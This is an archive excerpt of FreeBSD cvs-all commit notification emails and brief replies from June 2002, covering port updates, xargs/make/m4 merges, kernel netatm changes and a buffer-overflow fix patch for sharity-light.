List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/16 20:46:08 PDT Modified files: net/dctc Makefile distinfo Log: Update to 0.83.1 Revision Changes Path 1.19 +1 -1 ports/net/dctc/Makefile 1.16 +1 -1 ports/net/dctc/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 20:47:44 2002 Delivered-To: cvs-all@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 11D7437B40D; Sun, 16 Jun 2002 20:47:40 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5H3lcDK088114; Sun, 16 Jun 2002 23:47:39 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5H3lcOx088111; Sun, 16 Jun 2002 23:47:38 -0400 (EDT) (envelope-from wollman) Date: Sun, 16 Jun 2002 23:47:38 -0400 (EDT) From: Garrett Wollman Message-Id: <200206170347.g5H3lcOx088111@khavrinen.lcs.mit.edu> To: Bruce Evans Cc: , Subject: Re: cvs commit: src/sys/dev/drm drm_os_freebsd.h In-Reply-To: <20020617134613.A3073-100000@gamplex.bde.org> References: <200206170103.g5H13wGP087029@khavrinen.lcs.mit.edu> <20020617134613.A3073-100000@gamplex.bde.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG < said: > Please fix misuses of all over the kernel. I already did that once, after the old select.h was copied to selinfo.h. By this point, the driver writers have had fair warning. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 20:53:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C408B37B413; Sun, 16 Jun 2002 20:53:23 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H3rN815017; Sun, 16 Jun 2002 20:53:23 -0700 (PDT) (envelope-from lioux) Message-Id: <200206170353.g5H3rN815017@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Sun, 16 Jun 2002 20:53:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/linux-edonkey-gui-gtk Makefile pkg-comment pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/16 20:53:23 PDT Modified files: net/linux-edonkey-gui-gtk Makefile pkg-comment pkg-plist Log: o After being repo copied from edonkey-gui-gtk: - Add linux- to both PKGNAMEPREFIX and binary name since it's a Linux binary port - State that in COMMENT - Update PLIST to reflect new binary name Repo copy by: joe Repo copy approved by: will Revision Changes Path 1.4 +3 -1 ports/net/linux-edonkey-gui-gtk/Makefile 1.2 +1 -1 ports/net/linux-edonkey-gui-gtk/pkg-comment 1.3 +1 -1 ports/net/linux-edonkey-gui-gtk/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 20:57:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 949DA37B405; Sun, 16 Jun 2002 20:57:23 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H3vN415339; Sun, 16 Jun 2002 20:57:23 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206170357.g5H3vN415339@freefall.freebsd.org> From: Juli Mallett Date: Sun, 16 Jun 2002 20:57:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/m4 m4.1 X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/16 20:57:23 PDT Modified files: (Branch: RELENG_4) usr.bin/m4 m4.1 Log: Document traditional BSD behaviour for changecom with no arguments. PR: bin/17480 Revision Changes Path 1.10.2.5 +2 -2 src/usr.bin/m4/m4.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21: 5: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A7FAA37B40F; Sun, 16 Jun 2002 21:05:07 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H457c17007; Sun, 16 Jun 2002 21:05:07 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206170405.g5H457c17007@freefall.freebsd.org> From: Juli Mallett Date: Sun, 16 Jun 2002 21:05:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/m4 m4.1 X-FreeBSD-CVS-Branch: RELENG_3 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/16 21:05:07 PDT Modified files: (Branch: RELENG_3) usr.bin/m4 m4.1 Log: MFRELENG_4: Document traditional BSD behaviour for changecom with no arguments. PR: bin/17480 Revision Changes Path 1.7.2.4 +3 -3 src/usr.bin/m4/m4.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21: 6:42 2002 Delivered-To: cvs-all@freebsd.org Received: from mail.pcnet.com (pcnet1.pcnet.com [204.213.232.3]) by hub.freebsd.org (Postfix) with ESMTP id 8FF3537B405; Sun, 16 Jun 2002 21:06:38 -0700 (PDT) Received: from localhost (eischen@localhost) by mail.pcnet.com (8.12.3/8.12.1) with ESMTP id g5H46b8c027229; Mon, 17 Jun 2002 00:06:37 -0400 (EDT) Date: Mon, 17 Jun 2002 00:06:37 -0400 (EDT) From: Daniel Eischen To: Garrett Wollman Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/lib/libc/gen Makefile.inc pselect.3 In-Reply-To: <200206170223.g5H2NfCi087626@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 16 Jun 2002, Garrett Wollman wrote: > < said: > > > Actually document pselect(3) so that Bruce can mention it in the release > > notes. :-) > > For whomever is working on the threads library these days... I guess that's me. > I have a strong suspicion that pselect() is supposed to be a > cancellation point, so another wrapper should be added to libc_r. pselect() isn't listed as a cancellation point in the Austin spec (draft 6 anyways): http://www.opengroup.org/onlinepubs/007904975/functions/xsh_chap02_09.html#tag_02_09_05_02 Strange, since select() is. -- Dan Eischen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21:15:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3DDD937B405; Sun, 16 Jun 2002 21:15:27 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H4FRC21121; Sun, 16 Jun 2002 21:15:27 -0700 (PDT) (envelope-from lioux) Message-Id: <200206170415.g5H4FRC21121@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Sun, 16 Jun 2002 21:15:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/edonkey-gui-gtk Makefile distinfo pkg-message pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/16 21:15:27 PDT Modified files: net/edonkey-gui-gtk Makefile distinfo pkg-plist Added files: net/edonkey-gui-gtk pkg-message Log: o After being repo copied to linux-edonkey-gui-gtk: - Remove all Linux references since this is now a FreeBSD native binary port - House the binary under MASTER_SITE_LOCAL - Update to 0.2 alpha Build 2002061600 - Add PKGMESSAGE on the binary issue. Small excerpt of most relevant part: "Currently, this native version is restricted to the following FreeBSD platforms: - i386 FreeBSD 4.x-STABLE (post 4.6R Release); OSVERSION=450006" Revision Changes Path 1.4 +35 -25 ports/net/edonkey-gui-gtk/Makefile 1.3 +2 -1 ports/net/edonkey-gui-gtk/distinfo 1.1 +16 -0 ports/net/edonkey-gui-gtk/pkg-message (new) 1.3 +4 -0 ports/net/edonkey-gui-gtk/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21:22:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AC30D37B401; Sun, 16 Jun 2002 21:22:42 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H4MgK21956; Sun, 16 Jun 2002 21:22:42 -0700 (PDT) (envelope-from lioux) Message-Id: <200206170422.g5H4MgK21956@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Sun, 16 Jun 2002 21:22:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/16 21:22:42 PDT Modified files: . modules Log: Add module linux-edonkey-gui-gtk Revision Changes Path 1.5368 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21:23:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C54237B414; Sun, 16 Jun 2002 21:23:25 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H4NPM22030; Sun, 16 Jun 2002 21:23:25 -0700 (PDT) (envelope-from lioux) Message-Id: <200206170423.g5H4NPM22030@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Sun, 16 Jun 2002 21:23:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/16 21:23:25 PDT Modified files: net Makefile Log: Connect linux-edonkey-gui-gtk with build after repo copy from edonkey-gui-gtk Repo copy by: joe Repo copy approved by: will Revision Changes Path 1.786 +1 -0 ports/net/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21:30:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4D70637B41F; Sun, 16 Jun 2002 21:30:48 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H4Umm23177; Sun, 16 Jun 2002 21:30:48 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206170430.g5H4Umm23177@freefall.freebsd.org> From: Juli Mallett Date: Sun, 16 Jun 2002 21:30:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make str.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/16 21:30:48 PDT Modified files: (Branch: RELENG_4) usr.bin/make str.c Log: MFC revision 1.21: Fix make(1) behaviour regarding SysV-style substitution when given a nil left-hand-side. PR: bin/5297 Submitted by: "Matthew Emmerton" Revision Changes Path 1.12.2.1 +7 -1 src/usr.bin/make/str.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21:34: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D51F437B422; Sun, 16 Jun 2002 21:33:45 -0700 (PDT) Received: (from wes@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H4XjW23388; Sun, 16 Jun 2002 21:33:45 -0700 (PDT) (envelope-from wes) Message-Id: <200206170433.g5H4XjW23388@freefall.freebsd.org> From: Wes Peters Date: Sun, 16 Jun 2002 21:33:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/sharity-light/files patch-getenv X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wes 2002/06/16 21:33:45 PDT Added files: net/sharity-light/files patch-getenv Log: Don't allow environment variables to overflow their buffers. Reviewed by: nectar@ Revision Changes Path 1.1 +74 -0 ports/net/sharity-light/files/patch-getenv (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21:39:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 54BA437B425; Sun, 16 Jun 2002 21:39:27 -0700 (PDT) Received: (from dinoex@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H4dRK23845; Sun, 16 Jun 2002 21:39:27 -0700 (PDT) (envelope-from dinoex) Message-Id: <200206170439.g5H4dRK23845@freefall.freebsd.org> From: Dirk Meyer Date: Sun, 16 Jun 2002 21:39:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/raysfilter Makefile ports/mail/vbsfilter Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dinoex 2002/06/16 21:39:27 PDT Modified files: mail/raysfilter Makefile mail/vbsfilter Makefile Log: Verified that "-lsm -lsmutil" and no longer needed. Thanks to Stephane Lentz PR: 37908 Revision Changes Path 1.4 +1 -1 ports/mail/raysfilter/Makefile 1.12 +1 -1 ports/mail/vbsfilter/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21:44:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 82D0037B40C; Sun, 16 Jun 2002 21:44:47 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H4il724658; Sun, 16 Jun 2002 21:44:47 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206170444.g5H4il724658@freefall.freebsd.org> From: Juli Mallett Date: Sun, 16 Jun 2002 21:44:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/xargs Makefile strnsubst.c xargs.1 xargs.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/16 21:44:47 PDT Modified files: (Branch: RELENG_4) usr.bin/xargs Makefile xargs.1 xargs.c Added files: (Branch: RELENG_4) usr.bin/xargs strnsubst.c Log: Merge the xargs(1) utility from CURRENT. Major rework of the code, addition of -I, -L, -R, etc., for SUSv3 conformance. Reviewed by: src/tools/regression/usr.bin/xargs Revision Changes Path 1.1.1.1.14.1 +7 -0 src/usr.bin/xargs/Makefile 1.5.2.1 +86 -0 src/usr.bin/xargs/strnsubst.c (new) 1.6.2.8 +85 -11 src/usr.bin/xargs/xargs.1 1.9.2.3 +350 -128 src/usr.bin/xargs/xargs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 21:46:25 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id F39C137B425; Sun, 16 Jun 2002 21:46:17 -0700 (PDT) Date: Sun, 16 Jun 2002 21:46:17 -0700 From: Juli Mallett To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/xargs Makefile strnsubst.c xargs.1 xargs.c Message-ID: <20020616214617.A84036@FreeBSD.ORG> References: <200206170444.g5H4il724658@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206170444.g5H4il724658@freefall.freebsd.org>; from jmallett@FreeBSD.org on Sun, Jun 16, 2002 at 09:44:47PM -0700 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * Juli Mallett escriurères > jmallett 2002/06/16 21:44:47 PDT > > Modified files: (Branch: RELENG_4) > usr.bin/xargs Makefile xargs.1 xargs.c > Added files: (Branch: RELENG_4) > usr.bin/xargs strnsubst.c > Log: > Merge the xargs(1) utility from CURRENT. > > Major rework of the code, addition of -I, -L, -R, etc., for SUSv3 conformance. NB: -I and -L were for SUS conformance, -R was in deference to SUS silliness. > Reviewed by: src/tools/regression/usr.bin/xargs > > Revision Changes Path > 1.1.1.1.14.1 +7 -0 src/usr.bin/xargs/Makefile > 1.5.2.1 +86 -0 src/usr.bin/xargs/strnsubst.c (new) > 1.6.2.8 +85 -11 src/usr.bin/xargs/xargs.1 > 1.9.2.3 +350 -128 src/usr.bin/xargs/xargs.c -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 22: 1:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 62D1E37B429; Sun, 16 Jun 2002 22:01:46 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H51kW26491; Sun, 16 Jun 2002 22:01:46 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206170501.g5H51kW26491@freefall.freebsd.org> From: Juli Mallett Date: Sun, 16 Jun 2002 22:01:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/uuencode uuencode.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/16 22:01:46 PDT Modified files: (Branch: RELENG_4) usr.bin/uuencode uuencode.c Log: MFC revision 1.13: Group base64 encoded output differently. Revision Changes Path 1.4.2.4 +6 -3 src/usr.bin/uuencode/uuencode.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 22:40:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AE9E137B41F; Sun, 16 Jun 2002 22:40:49 -0700 (PDT) Received: (from jhay@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H5enK34259; Sun, 16 Jun 2002 22:40:49 -0700 (PDT) (envelope-from jhay) Message-Id: <200206170540.g5H5enK34259@freefall.freebsd.org> From: John Hay Date: Sun, 16 Jun 2002 22:40:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf files src/sys/modules/sppp Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jhay 2002/06/16 22:40:49 PDT Modified files: sys/conf files sys/modules/sppp Makefile Log: sppp needs slcompress.c nowadays. PR: 39369 Revision Changes Path 1.649 +1 -0 src/sys/conf/files 1.5 +1 -1 src/sys/modules/sppp/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 22:57:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3724737B41C; Sun, 16 Jun 2002 22:57:38 -0700 (PDT) Received: (from arr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H5vcG35842; Sun, 16 Jun 2002 22:57:38 -0700 (PDT) (envelope-from arr) Message-Id: <200206170557.g5H5vcG35842@freefall.freebsd.org> From: "Andrew R. Reiter" Date: Sun, 16 Jun 2002 22:57:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netatm atm_cm.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG arr 2002/06/16 22:57:38 PDT Modified files: sys/netatm atm_cm.c Log: - Explicitly pass M_WAITOK in a few calls to uma_zalloc(9). Revision Changes Path 1.19 +7 -7 src/sys/netatm/atm_cm.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 23: 0:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 36D2837B41D; Sun, 16 Jun 2002 23:00:20 -0700 (PDT) Received: (from arr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H60KD36096; Sun, 16 Jun 2002 23:00:20 -0700 (PDT) (envelope-from arr) Message-Id: <200206170600.g5H60KD36096@freefall.freebsd.org> From: "Andrew R. Reiter" Date: Sun, 16 Jun 2002 23:00:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netatm atm_cm.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG arr 2002/06/16 23:00:20 PDT Modified files: sys/netatm atm_cm.c Log: - Turn a DIAGNOSTIC check into a KASSERT(9) macro. Revision Changes Path 1.20 +2 -6 src/sys/netatm/atm_cm.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 23: 1:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9C3D537B41C; Sun, 16 Jun 2002 23:01:10 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H61Am36612; Sun, 16 Jun 2002 23:01:10 -0700 (PDT) (envelope-from marcus) Message-Id: <200206170601.g5H61Am36612@freefall.freebsd.org> From: Joe Marcus Clarke Date: Sun, 16 Jun 2002 23:01:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/metacity-setup Makefile distinfo pkg-plist ports/x11-wm/metacity-setup/files patch-Makefile.in patch-src_main.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/16 23:01:10 PDT Modified files: x11-wm/metacity-setup Makefile distinfo pkg-plist Added files: x11-wm/metacity-setup/files patch-Makefile.in patch-src_main.c Log: * Update to 0.5 * ${PERL} --> ${REINPLACE_CMD} Revision Changes Path 1.7 +6 -6 ports/x11-wm/metacity-setup/Makefile 1.5 +1 -1 ports/x11-wm/metacity-setup/distinfo 1.1 +15 -0 ports/x11-wm/metacity-setup/files/patch-Makefile.in (new) 1.1 +11 -0 ports/x11-wm/metacity-setup/files/patch-src_main.c (new) 1.3 +2 -1 ports/x11-wm/metacity-setup/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 23:10:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C417D37B414; Sun, 16 Jun 2002 23:10:17 -0700 (PDT) Received: (from arr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H6AHk41626; Sun, 16 Jun 2002 23:10:17 -0700 (PDT) (envelope-from arr) Message-Id: <200206170610.g5H6AHk41626@freefall.freebsd.org> From: "Andrew R. Reiter" Date: Sun, 16 Jun 2002 23:10:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netatm atm_subr.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG arr 2002/06/16 23:10:17 PDT Modified files: sys/netatm atm_subr.c Log: - Turn a DIAGNOSTIC check into a KASSERT(9). Revision Changes Path 1.32 +1 -4 src/sys/netatm/atm_subr.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 23:13:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C69D237B411; Sun, 16 Jun 2002 23:13:29 -0700 (PDT) Received: (from jhay@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H6DTc42094; Sun, 16 Jun 2002 23:13:29 -0700 (PDT) (envelope-from jhay) Message-Id: <200206170613.g5H6DTc42094@freefall.freebsd.org> From: John Hay Date: Sun, 16 Jun 2002 23:13:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf files X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jhay 2002/06/16 23:13:29 PDT Modified files: (Branch: RELENG_4) sys/conf files Log: MFC: sppp needs slcompress.c nowadays. Revision Changes Path 1.340.2.103 +1 -0 src/sys/conf/files To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 23:14:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1FF6837B43E; Sun, 16 Jun 2002 23:14:41 -0700 (PDT) Received: (from jhay@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id 